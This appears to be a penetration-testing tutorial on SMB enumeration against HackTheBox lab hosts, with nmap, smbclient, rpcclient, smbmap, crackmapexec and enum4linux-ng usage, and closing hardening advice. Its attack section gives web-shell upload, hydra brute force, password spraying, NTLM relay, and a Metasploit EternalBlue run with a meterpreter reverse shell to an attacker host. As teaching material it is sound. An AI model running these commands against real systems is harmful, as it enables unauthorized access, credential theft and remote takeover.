SMB Enumeration
Protocol Overview
SMB Characteristics:
Ports: 139 (NetBIOS), 445 (Direct SMB)
Protocol: TCP-based
Purpose: File/printer sharing, network resource access
Implementation: Windows (native), Linux (Samba)
SMB Versions:
CIFS/SMB 1.0
Windows NT 4.0/2000
NetBIOS interface, Direct TCP
SMB 2.0
Windows Vista/2008
Performance upgrades, message signing
SMB 2.1
Windows 7/2008 R2
Locking mechanisms
SMB 3.0
Windows 8/2012
Multichannel, end-to-end encryption
SMB 3.1.1
Windows 10/2016
AES-128 encryption, integrity checking
Samba Implementation:
Purpose: SMB/CIFS implementation for Unix-based systems
Components: smbd (SMB daemon), nmbd (NetBIOS daemon)
Active Directory: Full domain controller capabilities (v4+)
Common SMB Configurations
Samba Configuration File
# Main configuration file
cat /etc/samba/smb.conf | grep -v "#\|\;"
[global]
workgroup = DEV.INFREIGHT.HTB
server string = DEVSMB
log file = /var/log/samba/log.%m
max log size = 1000
server role = standalone server
map to guest = bad user
usershare allow guests = yes
[printers]
comment = All Printers
browseable = no
path = /var/spool/samba
printable = yes
guest ok = no
[notes]
comment = CheckIT
path = /mnt/notes/
browseable = yes
read only = no
writable = yes
guest ok = yesKey Configuration Settings
[sharename]
Network share name
Enumeration target
workgroup = WORKGROUP
Workgroup/domain name
Domain information
path = /path/here/
Directory path
File system access
server string = STRING
Banner information
Information disclosure
usershare allow guests = yes
Guest access
Anonymous enumeration
map to guest = bad user
Invalid user handling
Authentication bypass
browseable = yes
Share visibility
Share enumeration
guest ok = yes
Anonymous access
Unauthenticated access
read only = no
Write permissions
File upload capability
writable = yes
Write access
Malicious file upload
Dangerous SMB Settings
High-Risk Configurations
browseable = yes # Allow share listing
read only = no # Enable write access
writable = yes # Allow file modification
guest ok = yes # Anonymous access
enable privileges = yes # Honor SID privileges
create mask = 0777 # Full permissions for new files
directory mask = 0777 # Full permissions for directories
logon script = script.sh # Login script execution
magic script = script.sh # Script on connection close
magic output = script.out # Script output locationSMB Enumeration Techniques
1. Nmap SMB Scanning
Basic SMB Scan:
# Standard SMB scan
sudo nmap -sV -sC -p139,445 target_ip
# SMB-specific scripts
sudo nmap -p445 --script smb-* target_ipAvailable Nmap SMB Scripts:
# Find SMB scripts
find / -name "*smb*" 2>/dev/null | grep scripts
smb-enum-domains.nse # Domain enumeration
smb-enum-groups.nse # Group enumeration
smb-enum-processes.nse # Process enumeration
smb-enum-sessions.nse # Session enumeration
smb-enum-shares.nse # Share enumeration
smb-enum-users.nse # User enumeration
smb-os-discovery.nse # OS information
smb-protocols.nse # Protocol versions
smb-security-mode.nse # Security settings
smb-server-stats.nse # Server statistics
smb-system-info.nse # System information
smb-vuln-*.nse # Vulnerability checksExample Nmap Output:
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Host script results:
|_nbstat: NetBIOS name: HTB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-09-19T13:16:04
|_ start_date: N/A2. SMBclient Enumeration
Share Listing:
# List shares with null session
smbclient -N -L //target_ip
# Connect to specific share
smbclient //target_ip/sharename
# Anonymous connection
smbclient -N //target_ip/sharenameSMBclient Commands:
# Directory operations
smb: \> ls # List directory contents
smb: \> cd directory # Change directory
smb: \> pwd # Current directory
smb: \> mkdir newdir # Create directory
# File operations
smb: \> get filename # Download file
smb: \> put localfile # Upload file
smb: \> mget *.txt # Download multiple files
smb: \> del filename # Delete file
# System commands
smb: \> !ls # Execute local command
smb: \> help # List available commandsExample SMBclient Session:
smbclient //10.129.14.128/notes
Enter WORKGROUP\username's password:
Anonymous login successful
smb: \> ls
. D 0 Wed Sep 22 18:17:51 2021
.. D 0 Wed Sep 22 12:03:59 2021
prep-prod.txt N 71 Sun Sep 19 15:45:21 2021
smb: \> get prep-prod.txt
getting file \prep-prod.txt of size 71 as prep-prod.txt (8.7 KiloBytes/sec)
smb: \> !cat prep-prod.txt
[] check your code with the templates
[] run code-assessment.py3. RPCclient Enumeration
RPC Connection:
# Connect with null session
rpcclient -U "" target_ip
rpcclient -N target_ip
# Alternative authentication
rpcclient -U "username" target_ipRPCclient Commands:
srvinfo
Server information
enumdomains
Enumerate domains
querydominfo
Domain information
netshareenumall
List all shares
netsharegetinfo <share>
Share information
enumdomusers
Enumerate domain users
queryuser <RID>
User information
enumdomgroups
Enumerate groups
querygroup <RID>
Group information
Example RPCclient Session:
rpcclient $> srvinfo
DEVSMB Wk Sv PrQ Unx NT SNT DEVSM
platform_id : 500
os version : 6.1
server type : 0x809a03
rpcclient $> enumdomains
name:[DEVSMB] idx:[0x0]
name:[Builtin] idx:[0x1]
rpcclient $> netshareenumall
netname: notes
remark: CheckIT
path: C:\mnt\notes\
password:
rpcclient $> enumdomusers
user:[mrb3n] rid:[0x3e8]
user:[cry0l1t3] rid:[0x3e9]
rpcclient $> queryuser 0x3e9
User Name : cry0l1t3
Full Name : cry0l1t3
Home Drive : \\devsmb\cry0l1t3
Profile Path: \\devsmb\cry0l1t3\profile
Password last set Time : Mi, 22 Sep 2021 17:50:56 CEST4. User RID Brute Forcing
Bash RID Enumeration:
# Brute force RIDs 500-1100
for i in $(seq 500 1100);do
rpcclient -N -U "" target_ip -c "queryuser 0x$(printf '%x\n' $i)" |
grep "User Name\|user_rid\|group_rid" && echo ""
done
# Results:
User Name : sambauser
user_rid : 0x1f5
group_rid: 0x201
User Name : mrb3n
user_rid : 0x3e8
group_rid: 0x201Impacket samrdump.py:
# Automated user enumeration
samrdump.py target_ip
# Example output:
Found user: mrb3n, uid = 1000
Found user: cry0l1t3, uid = 1001
mrb3n (1000)/FullName:
mrb3n (1000)/PasswordLastSet: 2021-09-22 17:47:59
cry0l1t3 (1001)/FullName: cry0l1t3
cry0l1t3 (1001)/PasswordLastSet: 2021-09-22 17:50:565. Advanced SMB Tools
SMBMap:
# Basic share enumeration
smbmap -H target_ip
# With credentials
smbmap -H target_ip -u username -p password
# Recursive directory listing
smbmap -H target_ip -R
# Example output:
[+] IP: 10.129.14.128:445 Name: 10.129.14.128
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
home NO ACCESS INFREIGHT Samba
dev NO ACCESS DEVenv
notes READ,WRITE CheckIT
IPC$ NO ACCESS IPC Service (DEVSM)CrackMapExec:
# Share enumeration
crackmapexec smb target_ip --shares -u '' -p ''
# User enumeration
crackmapexec smb target_ip -u '' -p '' --users
# Password spraying
crackmapexec smb target_ip -u users.txt -p passwords.txt
# Example output:
SMB 10.129.14.128 445 DEVSMB [+] Enumerated shares
SMB 10.129.14.128 445 DEVSMB Share Permissions Remark
SMB 10.129.14.128 445 DEVSMB notes READ,WRITE CheckITEnum4Linux-ng:
# Installation
git clone https://github.com/cddmp/enum4linux-ng.git
cd enum4linux-ng
pip3 install -r requirements.txt
# Comprehensive enumeration
./enum4linux-ng.py target_ip -A
# Specific enumeration
./enum4linux-ng.py target_ip -U # Users
./enum4linux-ng.py target_ip -S # Shares
./enum4linux-ng.py target_ip -G # GroupsSMB Security Issues
1. Anonymous Access
Risk: Unauthorized share access and information disclosure
Detection: Null session connections
Exploitation: Data theft, user enumeration
2. Weak Authentication
Risk: Credential-based attacks
Detection: Password spraying, brute force
Exploitation: Account compromise
3. Excessive Share Permissions
Risk: Unauthorized file access/modification
Detection: Permission enumeration
Exploitation: Data manipulation, malware deployment
4. Information Disclosure
Risk: Sensitive data exposure
Detection: Share browsing, file enumeration
Exploitation: Intelligence gathering
SMB Attack Vectors
1. Share Exploitation
# File upload for web shells
smbclient //target/webshare
smb: \> put shell.php
# Configuration file access
smbclient //target/config
smb: \> get database.conf2. Password Attacks
# Hydra SMB brute force
hydra -l user -P passwords.txt smb://target_ip
# CrackMapExec password spraying
crackmapexec smb target_ip -u users.txt -p 'Password123!'3. Relay Attacks
# SMB relay with Responder
responder -I eth0 -A
# ntlmrelayx.py for relay attacks
ntlmrelayx.py -tf targets.txt -smb2supportCommon Vulnerabilities
Critical SMB CVEs
CVE-2017-0144
EternalBlue
Remote Code Execution
Windows Vista - Windows 10, Server 2008-2016
CVE-2020-0796
SMBGhost (CoronaBlue)
Remote Code Execution
Windows 10 v1903/v1909, Server v1903/v1909
CVE-2017-7494
SambaCry
Remote Code Execution
Samba 3.5.0 - 4.6.4/4.5.10/4.4.14
CVE-2016-2118
Badlock
Man-in-the-Middle
Windows/Samba NTLM authentication
CVE-2017-12149
SMBLoris
Denial of Service
Windows SMB implementations
EternalBlue (CVE-2017-0144)
# Nmap EternalBlue detection
nmap -p445 --script smb-vuln-ms17-010 target
# Metasploit exploitation
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target
set payload windows/x64/meterpreter/reverse_tcp
set LHOST attacker_ip
exploit
# Manual verification
python checker.py target 445SMBGhost (CVE-2020-0796)
# Detection script
nmap -p445 --script smb-vuln-cve2020-0796 target
# Proof of concept
python3 cve-2020-0796.py target
# Metasploit module
use auxiliary/scanner/smb/smb_ms20_004
set RHOSTS target
runSambaCry (CVE-2017-7494)
# Vulnerability detection
nmap -p445 --script smb-vuln-cve2017-7494 target
# Manual check
smbclient //target/share -N
smb: \> allinfo /path/to/shared/library.so
# Exploitation requirements:
# - Samba version 3.5.0+
# - File upload to SMB share
# - Knowledge of share path on serverBadlock (CVE-2016-2118)
# NTLM authentication weaknesses
# Man-in-the-middle attacks on SMB authentication
# Affects both Windows and Samba implementations
# Detection
enum4linux-ng.py target -A | grep -i "signing"
rpcclient -N target -c "getdcname"Additional SMB Vulnerabilities
CVE-2008-4250: MS08-067 Conficker vulnerability
CVE-2017-0145: EternalBlue variant (MS17-010)
CVE-2017-0146: EternalBlue variant (MS17-010)
CVE-2019-0708: BlueKeep (RDP, but often found with SMB)
CVE-2020-1472: Zerologon (NetLogon, SMB-related)
Vulnerability Scanning
# Comprehensive SMB vulnerability scan
nmap -p445 --script smb-vuln-* target
# Specific vulnerability checks
nmap -p445 --script smb-vuln-ms17-010 target # EternalBlue
nmap -p445 --script smb-vuln-cve2020-0796 target # SMBGhost
nmap -p445 --script smb-vuln-cve2017-7494 target # SambaCry
# Metasploit auxiliary scanners
use auxiliary/scanner/smb/smb_ms17_010 # EternalBlue scanner
use auxiliary/scanner/smb/smb_ms20_004 # SMBGhost scannerSMB Enumeration Checklist
Initial Reconnaissance
Share Enumeration
User Enumeration
Authentication Testing
Advanced Testing
Tools for SMB Enumeration
Built-in Tools
# SMB client
smbclient -L //target_ip
# RPC client
rpcclient -U "" target_ip
# NetBIOS enumeration
nmblookup -A target_ipSpecialized Tools
# SMBMap
smbmap -H target_ip
# CrackMapExec
crackmapexec smb target_ip --shares
# Enum4Linux-ng
enum4linux-ng.py target_ip -A
# Impacket tools
samrdump.py target_ip
smbexec.py domain/user:pass@target_ipNmap Scripts
# Comprehensive SMB scan
nmap -p445 --script smb-enum-*,smb-vuln-*,smb-os-discovery target_ipDefensive Measures
SMB Server Hardening
Disable SMBv1 - Use SMBv2/v3 only
Restrict anonymous access - Disable null sessions
Implement strong authentication - Kerberos, NTLM restrictions
Use share-level permissions - Principle of least privilege
Enable message signing - Prevent tampering
Regular security updates - Patch known vulnerabilities
Network Security
Firewall restrictions - Block SMB ports externally
Network segmentation - Isolate file servers
Monitor SMB traffic - Detect anomalies
Implement SMB over VPN - Secure remote access
Last updated